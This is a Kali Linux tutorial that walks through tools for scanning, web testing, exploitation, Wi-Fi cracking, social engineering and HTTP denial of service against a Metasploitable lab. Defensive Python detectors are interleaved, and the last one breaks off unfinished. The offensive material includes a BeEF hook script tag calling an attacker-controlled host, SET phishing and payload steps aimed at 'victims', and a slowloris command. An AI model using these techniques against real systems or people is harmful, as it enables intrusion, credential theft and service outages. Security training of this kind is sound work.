Kali Linux Tutorial

Kali Linux is one of the best open-source security packages for the ethical hacker, containing a set of tools divided into categories. Kali Linux can be installed on a machine as its operating system, as discussed in this guide. Installing Kali Linux is a practical option as it gives you more options to work with and combine tools.

This guide gives a complete understanding of Kali Linux and explains how to use it in practice.

This guide has been prepared for beginners to help them understand the basics of Kali Linux. This will be especially useful for penetration testing professionals. After completing this guide, you will find that you have a moderate level of knowledge and will be able to move to the next level.

While this guide will be helpful to most beginners, it will definitely be a plus if you are familiar with the basic concepts of any Linux operating system.

This guide covers the following topics:

Kali Linux - Installation and setup 

Kali Linux - Information Gathering Tools

Kali Linux - Vulnerability Analysis Tools

Kali Linux - Wireless attacks

Kali Linux - Website Penetration Testing

Kali Linux - Exploitation Tools

Kali Linux - Forensic Tools

Kali Linux - Social Engineering

Kali Linux - Stress Tools

Kali Linux - sniffing and spoofing

Kali Linux - Password Cracking Tools

Kali Linux - Maintaining Access

Kali Linux - reverse engineering

Kali Linux - Reporting Tools                       

In this chapter, we will learn about Kali Linux installation and setup.

 Kali Linux is one of the best security packages for the ethical hacker, containing a set of tools divided into categories. It is open-source and its official web page is https://www.kali.org.

Typically, Kali Linux can be installed on a machine as an operating system or as a virtual machine, which we will discuss in the next section. Installing Kali Linux is a practical option as it gives you more options to work with and combine tools. You can also create a live boot CD or USB. All this can be found at the following link: https://www.kali.org/downloads/

BackTrack was the predecessor of the Kali Linux distribution. The latest release is Kali 2022, and the distribution is updated very frequently.

To install Kali Linux -

First, we will download Virtual Box and install it.

Later, we will download and install the Kali Linux distribution.

Download and install Virtual Box

Virtual Box is especially useful when you want to test something on Kali Linux that you are not sure about. Running Kali Linux on Virtual Box is safe if you want to experiment with unknown packages or test code.

With Virtual Box, you can install Kali Linux on your system (not directly on your hard drive) alongside your main OS, which can be macOS, Windows, or another flavor of Linux.

Let's see how you can download and install Virtual Box on your system.

Step 1 - Go to https://www.virtualbox.org/wiki/Downloads to download. Select the correct package depending on your operating system. In this case, it will be the first for Windows as shown in the following screenshot.


Step 2 - Click Next .

Step 3 - On the next page, you will be able to select the location where you want to install the application. In this case, leave this value as default and click Next .

Step 4 - Click Next and the following Custom Setup screenshot appears. Select the components you want to install and click on Next.


Step 5 - Click Yes to proceed with the installation.



Step 6 - Click the Finish button.



The Virtual Box application will open as shown in the following screenshot. We are now ready to install the rest of the hosts for this tutorial and this is also recommended for professional use.


Install Kali Linux

Now that we have successfully installed Virtual Box, let's move on to the next step and install Kali Linux.

Step 1 - Download the Kali Linux package from the official website: https://www.kali.org/downloads/

Step 2 - Click VirtualBox 

Step 3 - Select the correct virtual hard disk file and click Open .

Step 4 - Launch Kali OS. The default username is root and the password is toor .

Update Kali

It is important to keep Kali Linux and its tools updated to new versions to keep them functional. Following are the steps to upgrade Kali.

Step 1 - Go to Application → Terminal. Then type "apt-get update" and the update will happen as shown in the following screenshot.

Step 2 - Now to update the tools, type "apt-get upgrade" and the new packages will be downloaded.

Step 3 - It will ask if you want to continue. Type "Y" and "Enter".

Step 4 - To upgrade to a newer version of the operating system, type "apt-get dist-upgrade".


Lab setup

In this section, we will set up another test machine to run tests with the Kali Linux tools.

Step 1 - Download Metasploitable which is a Linux machine. It can be downloaded from the Rapid7 official website : https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web

Step 2 - Sign up with your details. By filling out the form above, we can download the software.

Step 3 - Click VirtualBox → New .

Step 4 - Click “Use an existing virtual hard disk file” . Browse the file where you downloaded Metasploitable and click Open .

Step 5 - A screen for creating a virtual machine will appear. Click Create.

Default username: msfadmin and password msfadmin .

  In this chapter, we will discuss Kali Linux information-gathering tools.


NMAP and ZenMAP

NMAP and ZenMAP are useful tools in the scanning phase of ethical hacking in Kali Linux. NMAP and ZenMAP are basically the same tools, however, NMAP uses the command line while ZenMAP has a graphical interface.


NMAP is a free tool for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

NMAP uses raw IP packets in novel ways to determine which hosts are available on the network, what services (application name and version) these hosts offer, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and so on.


Now let's go step by step 


Step 1 -  go to Applications → 01-Information Gathering → nmap or zenmap.

Step 2 - The next step is to determine the OS type/version of the target host. According to the NMAP help, OS type/version detection is enabled with the "-O" option. For more information use this link: https://nmap.org/book/man-os-detection.html


The command we will be using is :-

nmap -O 192.168.1.101

The following screenshot shows where you need to enter the above command to see the output of Nmap.


Step 3 - Next, find the open TCP and UDP ports. To scan all TCP ports with NMAP, use the following command -

nmap -p 1-65535 -T4  192.168.1.101

Where the "-p" option specifies the TCP ports to be scanned, in this case all of them, and "-T4" is the timing template (scan speed) that NMAP should run at.

Below are the results. Green shows all open TCP ports and red shows all closed ports. However, the NMAP output is not shown here because the list is too long.

Stealth scan

A stealth scan, or SYN scan, is also known as a half-open scan because it does not complete the TCP three-way handshake. The hacker sends a SYN packet to the target; if a SYN/ACK frame is received back, it is assumed that the target would complete the connection and that the port is listening. If a RST is received from the target, the port is assumed to be inactive or closed.

Now, to see SYN scanning in action, use the -sS option in NMAP. Following is the complete command -

nmap -sS -T4  192.168.1.101

The following screenshot shows how to use this command -
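Seen from the monitored host's side, the half-open pattern described above is what gives a SYN scan away: many SYNs from one source to different ports, none followed by the final ACK. The Python sketch below is an added example, not part of the original tutorial; the packet records, the addresses other than 192.168.1.101, and the thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict


def build_sample_capture():
    """Constructed packet records: (time, src, dst, sport, dport, tcp_flags)."""
    scanner, client, target = "192.168.1.50", "192.168.1.20", "192.168.1.101"
    listening = {22, 80, 3306}
    packets, t = [], 0.0
    # A SYN scan: one SYN per port, never followed by the final ACK.
    for i, port in enumerate([21, 22, 23, 25, 80, 110, 443, 3306]):
        sport = 40000 + i
        packets.append((t, scanner, target, sport, port, "S"))
        if port in listening:
            packets.append((t + 0.001, target, scanner, port, sport, "SA"))
            packets.append((t + 0.002, scanner, target, sport, port, "R"))
        else:
            packets.append((t + 0.001, target, scanner, port, sport, "RA"))
        t += 0.01
    # An ordinary client completing the three-way handshake twice.
    for sport in (51000, 51001):
        packets.append((t, client, target, sport, 80, "S"))
        packets.append((t + 0.001, target, client, 80, sport, "SA"))
        packets.append((t + 0.002, client, target, sport, 80, "A"))
        t += 1.0
    return packets


def classify_handshakes(packets):
    """Map each (client, server, sport, dport) flow to its handshake outcome."""
    state = {}
    for _, src, dst, sport, dport, flags in sorted(packets):
        fwd = (src, dst, sport, dport)   # flow keyed from the sender's side
        rev = (dst, src, dport, sport)   # same flow keyed from the client's side
        if flags == "S":
            state[fwd] = "unanswered"    # SYN seen, no reply yet (filtered port)
        elif flags == "SA" and state.get(rev) == "unanswered":
            state[rev] = "syn_ack"       # server is listening
        elif flags in ("R", "RA") and state.get(rev) == "unanswered":
            state[rev] = "closed"        # server refused the SYN
        elif flags == "A" and state.get(fwd) == "syn_ack":
            state[fwd] = "completed"     # normal three-way handshake
        elif flags in ("R", "RA") and state.get(fwd) == "syn_ack":
            state[fwd] = "half_open"     # client tore it down instead of ACKing
    return state


def find_syn_scanners(packets, min_ports=5, max_completed_ratio=0.2):
    """Flag sources that probe many ports but almost never finish a handshake."""
    per_pair = defaultdict(lambda: {"outcomes": Counter(), "ports": set(),
                                    "revealed": set()})
    for (client, server, _sport, dport), outcome in classify_handshakes(packets).items():
        entry = per_pair[(client, server)]
        entry["outcomes"][outcome] += 1
        entry["ports"].add(dport)
        if outcome == "half_open":
            entry["revealed"].add(dport)
    alerts = []
    for (client, server), entry in sorted(per_pair.items()):
        attempts = sum(entry["outcomes"].values())
        completed = entry["outcomes"]["completed"]
        if len(entry["ports"]) >= min_ports and completed / attempts <= max_completed_ratio:
            alerts.append({
                "source": client,
                "target": server,
                "ports_probed": len(entry["ports"]),
                "half_open": entry["outcomes"]["half_open"],
                "closed": entry["outcomes"]["closed"],
                "listening_ports_revealed": sorted(entry["revealed"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_syn_scanners(build_sample_capture()):
        print(alert)
```

The "listening_ports_revealed" field lists the services the scanner now knows about, which is the natural starting point for reviewing firewall rules on the scanned host.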


Searchsploit

Searchsploit is a tool that helps Kali Linux users to perform direct searches using the command line from the Exploit database archive.

To open it, go to Applications → 08-Exploitation Tools → searchsploit as shown in the following screenshot.

After opening a terminal, enter " searchsploit exploit index name ".

DNS tools

In this section, we will learn how to use some of the DNS tools built into Kali. Essentially, these tools help with zone transfers or with resolving domain IP issues.

dnsenum.pl

The first tool is dnsenum.pl, which is a PERL script that helps to retrieve the MX, A and other records associated with a domain.

Click Terminal in the left pane.

Type “dnsenum domain name” and all entries will be shown. In this case, A records are displayed.

DNSMAP

The second tool is DNSMAP which helps to find phone numbers, contacts and other subdomains associated with this domain we are looking for. Below is an example.

Click the terminal like in the top section, then write “dnsmap domain name”

dnstracer

The third tool is dnstracer , which determines where a given Domain Name Server (DNS) gets information for a given hostname.

Click terminal like in the top section, then type “dnstracer domain name”.

LBD Tools

The LBD (Load Balancing Detector) tools are very interesting as they detect if a given domain is using DNS and/or HTTP load balancing. This is important because if you have two servers, one or the other may not be updated and you can try to use it. Following are the steps to use it -

First, click Terminal on the left pane.

Then enter "lbd domainname" . If it returns "FOUND", it means that the server has load balancing. In this case, the result will be "NOT FOUND".

Hping3

Hping3 is widely used by ethical hackers. It is almost similar to the ping tools but is more advanced as it can bypass the firewall filter and use TCP, UDP, ICMP and RAW-IP protocols. It has a trace mode and the ability to send files between a closed channel.

Click Terminal in the left pane.

Type "hping3 -h" which will show you how to use this command.

Another command “hping3 domain or IP -parameter”

In this chapter, we will learn how to use some of the tools that help us exploit devices or applications in order to gain access.


Cisco Tools

Kali has some tools that can be used to exploit a Cisco router. One such tool is Cisco-torch, which is used for bulk scanning, fingerprinting and exploitation.


Let's open the terminal console by clicking on the left pane.




Then enter "cisco-torch -parameter IP of host". If nothing exploitable is found, the following result will be shown.




To see which options you can use, type “cisco-torch ?”




Cisco Audit Tool

This is a PERL script that scans Cisco routers for common vulnerabilities. To use it, open the terminal again in the left pane as shown in the previous section and type "CAT -h hostname or IP".


You can add the port parameter “-p” as shown in the following screenshot, which in this case is 23 to iterate over it.


Cisco Global Exploiter

Cisco Global Exploiter (CGE) is an advanced, simple and fast security assessment tool. With this tool, you can perform several types of attacks, as shown in the following screenshot. However, be careful when testing in a real environment, as some of them may cause the Cisco device to fail. For example, an option might stop services.


To use this tool, enter "cge.pl IPaddress number of vulnerabilities"


The following screenshot shows the result of a test performed on a Cisco router for vulnerability number 3 from the list above. The result shows that the vulnerability was successfully exploited.


BED

BED is a program designed to check daemons for possible buffer overflows, format strings, etc.


In this case, we will test the test machine with IP 192.168.1.102 and the HTTP protocol.


The command will be "bed -s HTTP -t 192.168.1.102" and testing will continue.


 In this chapter, we will learn how to use the Wi-Fi hacking tools built into Kali Linux. However, it is important that the wireless card you are using supports monitor mode.


Fern Wifi Cracker

Fern Wifi Cracker is one of Kali's tools for cracking wireless networks.

Before opening Fern, we must put the wireless card into monitor mode. To do this, type the command "airmon-ng start wlan0" in the terminal.

Now open Fern Wireless Cracker.

Step 1 - Click  "Applications"→ Click "Wireless Attacks" → "Fern Wireless Cracker".

Step 2 - Select your wireless card as shown in the following screenshot.

Step 3 - Click on the "Search for Access Points".

Step 4 - After the scan is completed, all found wireless networks will be displayed. In this case, only "WPA networks" were detected.

Step 5 - Click WPA networks as shown in the screenshot above. It shows all the wireless networks found. Typically, on WPA networks, it performs dictionary attacks.

Step 6 - Click on "Browse" and find the attack word list.

Step 7 - Click "Wi-Fi Attack".

Step 8 - After completing the dictionary attack, it has found the password and it will be displayed as shown in the following screenshot.


Kismet

Kismet is a Wi-Fi network analysis tool. It is an 802.11 layer 2 wireless network detector, sniffer and intrusion detection system. It will work with any wireless card that supports raw monitoring mode (rfmon) and can sniff 802.11a/b/g/n traffic. It identifies networks, including hidden networks, by collecting packets.

To use it, put your wireless card into monitor mode. To do so, type "airmon-ng start wlan0" in a terminal.

Let's learn how to use this tool.

Step 1 - To run it, open a terminal and type "kismet".

Step 2 - Click OK.

Step 3 - Click "Yes" when prompted to start Kismet Server. Otherwise, it will stop working.

Step 4 - Leave the launch options as default. Click Start.

Step 5 - A table will now appear asking you to identify your wireless card. In this case, click Yes.

Step 6 - In this case, the wireless source is “wlan0” . This will need to be written in the “Intf” section → click “Add”.

Step 7 - It will start sniffing Wi-Fi networks as shown in the following screenshot.


Step 8 - Click any network, the wireless network information will appear as shown in the following screenshot.


GISKismet

GISKismet is a wireless visualization tool for hands-on presentation of data collected with Kismet. GISKismet stores information in a database so we can query the data and create plots using SQL. GISKismet currently uses SQLite for the database and GoogleEarth/KML files for plotting.

Let's learn how to use this tool.

Step 1 - To open GISKismet go to: Applications → Click Wireless Attacks → giskismet.


As you remember from the previous section, we used the Kismet tool to explore wireless data, and Kismet packs all of that data into netXML files.

Step 2 - To import this file into Giskismet, type "root@kali:~# giskismet -x Kismetfilename.netxml" and it will start importing the files.

Once imported, we can load into Google Earth the hotspots we found earlier.

Step 3 - Assuming we have already installed Google Earth, we click on File → Open file created by Giskismet → Click on Open.

The next map will be displayed.

Ghost Phisher

Ghost Phisher is a popular tool that helps create fake wireless access points and then carry out man-in-the-middle attacks.

Step 1 - To open it, click Applications → Wireless Attacks → Ghost Phisher.

Step 2 - After opening it, we will set up a fake hotspot using the following details.

Wireless input: wlan0

SSID: wireless access point name

IP Address: The IP address of the access point.

WAP: password that this SSID will have to connect


Step 3 - Click the Start button.

Wifite

This is another wireless cracking tool that attacks multiple WEP, WPA and WPS encrypted networks in a row.

First, the wireless card must be in monitoring mode.

Step 1 - To open it, go to Applications → Wireless Attack → Wifite.

Step 2 - Type "wifite -showb" to scan networks.

Step 3 - To start attacking wireless networks, press Ctrl + C.

Step 4 - Enter "1" to hack the first wireless network.

Step 5 - After the attack is completed, the key will be found.


 In this chapter, we will learn about website penetration testing offered by Kali Linux.


Using Vega

Vega is a free and open source scanner and testing platform for checking the security of web applications. Vega can help you find and test SQL injection, cross-site scripting (XSS), inadvertently exposed sensitive information, and other vulnerabilities. It is written in Java, GUI based and runs on Linux, OS X and Windows.


Vega includes an automatic scanner for quick tests and an intercepting proxy for tactical verification. Vega can be extended with a powerful API in the language of the web: JavaScript. Official web page https://subgraph.com/vega/




Step 1 - To open Vega, go to Applications → 03-Web Application Analysis → Vega.




Step 2 - If you don't see the app in the path, enter the following command.




Step 3 - Click the "+" icon to start scanning.




Step 4 - Enter the URL of the web page to be crawled. In this case, it is the Metasploitable machine → click Next.




Step 5 - Check all the boxes of the modules you want to manage. Then click Next.




Step 6 - Click "Next" again in the following screenshot.




Step 7 - Click Finish.



Step 8 - If the following table appears, click Yes.




The scan will proceed as shown in the following screenshot.




Step 9 - After the scan is completed, on the bottom left panel, you can see all the results, which are classified according to severity. If you click on it, you will see all the details of the vulnerabilities in the right panel, such as Request, Discussion, Impact, and Remediation.




ZapProxy

ZAP-OWASP Zed Attack Proxy (zap) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. This is a Java interface.


Step 1 - To open ZapProxy, go to Applications → 03-Web Application Analysis → owasp-zap.




Step 2 - Click "Accept".




ZAP will start loading.




Step 3 - Select one of the options as shown in the following screenshot and click Start.




The following web target is Metasploitable with IP: 192.168.1.101




Step 4 - Enter the URL of the test web target in "URL to attack" → click "Attack".





After the scan is completed, you will see all the scanned sites in the upper left panel.


In the left "Alerts" panel, you will see all the results along with a description.



Step 5 - Click "Spider" and you will see all the crawled links.


Using database tools

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a wide range of switches ranging from database fingerprinting and fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Let's learn how to use sqlmap.


Step 1 - To open sqlmap go to Applications → 04-Database Assessment → sqlmap.




The web page that has parameters vulnerable to SQL injection is on Metasploitable.

                                         



Step 2 - To start SQL injection testing, enter "sqlmap -u URL of victim".



Step 3 - You will see from the results that some variables are vulnerable.




sqlninja

sqlninja is a tool designed to exploit SQL injection vulnerabilities in a web application that uses Microsoft SQL Server as its back end, up to full GUI access. Full details of this tool can be found at http://sqlninja.sourceforge.net/


Step 1 - To open sqlninja, go to Applications → 04-Database Assessment → sqlninja.




CMS scanning tools

WPScan

WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations for security issues.


Step 1 - To open WPscan, go to Applications → 03-Web Application Analysis → "wpscan".






The following screenshot will appear.


                                   

Step 2 - To scan the site for vulnerabilities, type "wpscan -u URL of webpage".


If the scanner is not up to date, it will ask you to update. I recommend doing this.



Once the scan starts, you will see the results. In the following screenshot, the vulnerabilities are indicated by a red arrow.



Joomscan

Joomla is probably the most widely used CMS due to its flexibility. For this CMS, this is the Joomla scanner. This will help web developers and webmasters identify potential security weaknesses in their Joomla deployments.


Step 1 - To open it, just click the terminal on the left panel, then type "joomscan -parameter".



 

Step 2 - To get help on usage, type "joomscan /?".



Step 3 - To start scanning, type "joomscan -u victim URL".



The results will be displayed as shown in the following screenshot.



SSL scanning tools

TLSSLed is a Linux shell script used to assess the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a full blown SSL/TLS scanner based on the openssl library, and on the "openssl s_client" command line tool.


Current tests include checking whether the target supports the SSLv2 protocol, the null cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (such as AES), whether the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.



 


 

To start testing, open a terminal and type "tlssled URL port". It will start testing the certificate to find data.



You can see from the output that the certificate is valid until 2018, as shown in green in the following screenshot.



w3af

w3af is a web application attack and audit framework that aims to identify and exploit all web application vulnerabilities. This package provides a graphical user interface (GUI) for the platform. If you only need a command line application, install w3af-console.


The framework has been dubbed "metasploit for the web", but it's actually much more than that, as it also detects web application vulnerabilities through black box scanning techniques. The w3af core and its plugins are written entirely in Python. The project has over 130 plugins that identify and exploit SQL injection, cross-site scripting (XSS), remote file inclusion, and more.



 


 

Step 1 - To open it go to Applications → 03-Web Application Analysis → Click w3af.



Step 2 - In the "Target" field, enter the victim's URL, which in this case will be the Metasploitable web address.



Step 3 - Select a profile → Click Start.



Step 4 - Go to "Results" and you will see the result with details.





 In this chapter, we will learn about the various exploitation tools offered by Kali Linux.


Metasploit

As we mentioned earlier, Metasploit is a product of Rapid7 and most of the resources can be found on their webpage www.metasploit.com . It is available in two versions - commercial and free. The differences between these two versions are small, so in this case we will use the community (free) version.


As an ethical hacker, you will use the Kali Distribution, which has a built-in version of the Metasploit community, as well as other ethical hacking tools, which are very convenient due to the installation time savings. However, if you want to install as a standalone tool, this is an application that can be installed on operating systems such as Linux, Windows, and OS X.


First, open the Metasploit console in Kali. Then go to Applications → Exploitation Tools → Metasploit.



After running it, you will see the following screen with the Metasploit version underlined in red.



In the console, if you use help or the ? symbol, it will show you a list of the MSF commands along with their descriptions. You can choose based on your needs and what you will be using.



Another important administrative command is msfupdate which helps update metasploit with the latest vulnerability exploits. After running this command in the console, you will have to wait a few minutes for the update to complete.



It has a nice command called "Search" that you can use to find what you need as shown in the following screenshot. For example, I want to search for Microsoft related exploits and the command might be msf >search name:Microsoft type:exploit .


Where "search" is the command, "name" is the name of the object we are looking for, and "type" is the script type we are looking for.



Another command is "info". It provides information about a module or platform: where it is used, who the author is, the vulnerability reference, and the payload restrictions it can have.



Armitage

The Armitage GUI for metasploit is a complementary tool for metasploit. It visualizes targets, recommends exploits, and provides enhanced post-exploitation options.


Let's open it, but first we need to open and run the metasploit console. To open Armitage, go to Applications → Exploitation Tools → Armitage.



Click the Connect icon button as shown in the following screenshot.



When it opens, you will see the following screen.



Armitage is easy to use. The "Targets" area lists all the machines you have discovered and are working with. Hacked targets are colored red with a thunderstorm on them.


Once you've hacked a target, you can right-click on it and continue exploring what you need to do, such as explore (browse) folders.



In the following GUI, you will see a folder view called the console. By simply clicking folders, you can navigate through folders without using metasploit commands.


On the right side of the GUI is a section that lists vulnerability modules.



BeEF

BeEF stands for Browser Exploitation Framework . It is a penetration testing tool that is focused on the web browser. BeEF allows a professional penetration tester to assess the actual security state of a target environment using client-side attack vectors.


First, you need to update the Kali package using the following commands:



 

root@kali:/# apt-get update  

root@kali:/# apt-get install beef-xss

To get started use the following command -


root@kali:/# cd /usr/share/beef-xss  

root@kali:/# ./beef


Open a browser and enter your username and password: beef .



A BeEF hook is a JavaScript file hosted by a BeEF server that must run on client browsers. When this happens, it contacts the BeEF server, passing a lot of information about the target. It also allows additional commands and modules to be run against the target. In this example, the location of the BeEF hook is at http://192.168.1.101:3000/hook.js .


To attack the browser, enable a JavaScript interceptor on the page that the client will be viewing. There are several ways to do this, but the simplest is to paste the following into the page and somehow get the client to open it.



 

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>


 

Once the page has loaded, return to the BeEF dashboard and click on "Online Browsers" in the top left corner. After a few seconds, you should see a pop-up with your IP address representing the connected browser. By hovering over an IP address, you can quickly get information such as browser version, operating system, and installed plugins.



To run a command remotely, click the "Owned" host. Then, under the commands, click the module you want to execute and finally click Run.
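Because the hook described above is an ordinary script element loaded from a foreign origin, a site owner can audit pages for script sources outside an allowlist and enforce the same allowlist with a Content-Security-Policy header. The following Python sketch is an added example, not part of the original tutorial or of BeEF; the page URL, the CDN origin and the sample HTML are constructed assumptions, and only the hook URL comes from the text.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: two expected scripts plus the hook tag from the text.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.test/lib.min.js"></script>
</head><body>
<h1>Cart</h1>
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
</body></html>"""

SAMPLE_PAGE_URL = "https://shop.example.test/cart"      # assumed page location
SAMPLE_ALLOWED = ["https://cdn.example.test"]           # assumed script allowlist


def origin_of(url):
    """Return scheme://host[:port] for an absolute URL, lower-cased."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def unexpected_scripts(html, page_url, allowed_origins):
    """List absolute script URLs whose origin is neither the page's own nor allowlisted."""
    allowed = {origin_of(page_url)}
    allowed |= {origin.lower().rstrip("/") for origin in allowed_origins}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)   # resolves relative and //host forms
        if origin_of(absolute) not in allowed:
            findings.append(absolute)
    return findings


def csp_header(allowed_origins):
    """Build a response header that makes browsers refuse any other script origin."""
    sources = ["'self'"] + sorted(origin.rstrip("/") for origin in allowed_origins)
    return "Content-Security-Policy: script-src " + " ".join(sources)


if __name__ == "__main__":
    for url in unexpected_scripts(SAMPLE_PAGE, SAMPLE_PAGE_URL, SAMPLE_ALLOWED):
        print("unexpected script origin:", url)
    print(csp_header(SAMPLE_ALLOWED))
```

With this header in place, a browser will not fetch or run a script from an origin that is missing from the list, even if the tag has been injected into the page.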



Linux Exploit Suggester

Suggests possible exploits given the release version 'uname -r' of the Linux operating system.


To run it, enter the following command -


root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 is the Linux kernel version we want to use.


 In this chapter, we will learn about the forensic tools available in Kali Linux.


p0f

p0f is a tool that can identify the operating system of the target host by simply examining captured packets, even if the device in question is behind a packet firewall. P0f does not create any additional network traffic, direct or indirect; no name lookup; no mysterious probes; no ARIN requests; nothing. In the hands of advanced users, P0f can detect the presence of a firewall, NAT usage, and the presence of load balancers.


Type "p0f -h" in terminal to see how to use it and you will get the following results.



It will even list the available interfaces.



Then enter the following command: "p0f -i eth0 -p -o filename".


Where the "-i" option is the name of the interface, as shown above. "-p" means it is in promiscuous mode. "-o" means that the result will be saved to a file.



Open a web page with the address 192.168.1.2



You can see from the results that the web server is using apache 2.x and the OS is Debian.


pdf-parser

pdf-parser is a tool that parses a PDF document to identify the fundamental elements used in the analyzed file. It will not render the PDF document. It is not a textbook example of a PDF parser, but it gets the job done. It is typically used for PDF files that you suspect have a script embedded in them.


Command -


pdf-parser  -o 10 filepath

where "-o" is the number of objects.



As you can see in the following screenshot, the pdf file opens a CMD command.



Dumpzilla

The Dumpzilla application is developed in Python 3.x and is designed to extract all forensically interesting information from the Firefox, Iceweasel and Seamonkey browsers for analysis.


ddrescue

It copies data from one file or block device (hard drive, CD, etc.) to another, trying to salvage the good parts first in case of read errors.


The basic operation of ddrescue is completely automatic. That is, you don't have to wait for an error, stop the program, restart it from a new position, etc.



 

If you use the mapfile feature of ddrescue, the data is rescued very efficiently (only the necessary blocks are read). In addition, you can interrupt the rescue operation at any time and resume it later at the same point. The map file is an important part of the efficiency of ddrescue. Use it unless you know what you are doing.


Command line -


dd_rescue infilepath  outfilepath

The "-v" option means verbose. "/dev/sdb" is the device to be rescued. The img file is the recovered image.



DFF

This is another forensic tool used to recover files. It also has a graphical interface. To open it, type “dff-gui” in the terminal and the following web interface will open.



Click File → Open Evidence.



The following table will open. Check "Raw format" and click "+" to select the folder you want to recover.



You can then view the files on the left side of the panel to see what has been recovered.


 In this chapter, we will learn about social engineering tools used in Kali Linux.


Using social engineering tools

The Social-Engineer Toolkit (SET) is an open source penetration testing framework designed for social engineering. SET has several configurable attack vectors that allow you to mount a plausible attack in a short amount of time. Tools like this use human behavior to trick them into attack vectors.


Let's learn how to use the social engineer toolkit.


Step 1 - To open SET, go to Applications → Social Engineering Tools → Click "SET" Social Engineering Tool.



Step 2 - It will ask if you agree to the terms of use. Type “y” as shown in the following screenshot.



Step 3 - Most of the menus shown in the following screenshot are self-explanatory, and among them, number 1 "Social Engineering Attacks" is the most important.



Step 4 - Type "1" → Enter. A submenu will open. If you press Enter again, you will see explanations for each submenu.


The Spear-phishing module allows you to specifically craft email messages and send them to targeted victims with FileFormat malicious payloads attached. For example, sending a malicious PDF document that, if opened by the victim, will compromise the system. If you want to spoof your email address, make sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config flag SENDMAIL=OFF to SENDMAIL=ON.


There are two types of spear phishing attacks:


Perform Bulk Email Attack

Creating a FileFormat Payload and Social Engineering Pattern

The former allows SET to do everything for you (option 1), the latter allows you to create your own FileFormat payload and use it in your attack.



Type “99” to return to the main menu and then type “2” to go to “Web Attack Vectors”.


The web attack module is a unique way to use multiple web attacks to compromise the intended victim. This module is used to perform phishing attacks against the victim if they follow the link. When following a link, many attacks can occur.



Type “99” to return to the main menu, then enter “3” .


The USB/CD/DVD infectious media module will create an autorun.inf file and a Metasploit payload. The payload and autorun file are written or copied to USB. When a DVD/USB/CD is inserted into the victim's machine, it triggers the autorun feature (if autorun is enabled) and hopefully compromises the system. You can choose the attack vector you want to use: file format exploits or a simple executable.



 

Below are the options of the Infectious Media Generator.


File Format Exploits

Standard Metasploit Executable


Type “99” to return to the main menu. Then type “4” to go to “Create a Payload and Listener”.


Creating a payload and listener is an easy way to create a Metasploit payload. It will export the exe file and generate the listener. You will need to convince the victim to download the exe file and run it to get the shell.



Type “99” to return to the main menu and then type “5” to go to “Mass Mailer Attack”.



A mass mailing attack will allow you to send multiple emails to victims and customize the messages. There are two options in bulk email; the first is to send an email to a single email address. The second option allows you to import a list that has all the recipients' emails and it will send your message to any number of people on that list.


Single email address for email attack

Bulk email attacks

Type “99” to return to the main menu and then type “9” to go to “Powershell Attack Vector”.



The Powershell Attack Vector module allows you to create attacks specific to PowerShell. These attacks allow the use of PowerShell, which is available by default on all Windows Vista and higher operating systems. PowerShell provides a favorable environment for deploying payloads and performing functions that are not triggered by preventive technologies.


Powershell alphanumeric shellcode injector

Powershell Reverse Shell

Powershell Bind Shell

Powershell Dump SAM database


 Stress tools are used to create DoS attacks or to create stress tests for various applications in order to take appropriate action in the future.


All stress testing tools are located in Applications → 02-Vulnerability Analysis → Stress Testing.



All stress tests will be run on a Metasploitable machine with IP address 192.168.1.102.



Slowhttptest

Slowhttptest is one of the DoS attack tools. It specifically uses the HTTP protocol to connect to the server and to keep resources such as CPU and RAM busy. Let's see in detail how to use it and explain its functions.


To open slowhttptest, first open a terminal and type “slowhttptest –parameters” .



 

You can type "slowhttptest -h" to see all the options you need to use. If you get "Command not found" output, you need to type "apt-get install slowhttptest" first .



Then after installation again type slowhttptest -h



Enter the following command -


slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2

Where,


-c 500 = 500 connections

-H = Slowloris mode

-g = Generate statistics

-o outputfile = Output file name

-i 10 = Wait 10 seconds between follow-up data

-r 200 = 200 connections per second

-t GET = Use GET requests

-u http://192.168.1.202/index.php = target URL

-x 24 = maximum length of follow-up data, 24 bytes

-p 2 = 2 second timeout when probing whether the server still responds



After starting the test, the output will be as shown in the following screenshot, where you can see that the service is available.



After some time, at connection 287, the service becomes unavailable. This means that the server can handle a maximum of 287 HTTP connections.
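Seen from the server, the Slowloris mode used above leaves one client holding many connections whose request headers never complete. The following is an added example, not part of the original tutorial, that flags such clients in a snapshot of connection records; the record fields, the thresholds and the client address 192.168.1.50 are assumptions, and the sample data is constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Conn:
    src: str            # client IP address
    opened: float       # time the TCP connection was accepted (seconds)
    headers_done: bool  # True once the blank line ending the headers arrived
    bytes_in: int       # request bytes received so far


def slow_header_clients(conns, now, min_age=30.0, max_rate=10.0, min_conns=50):
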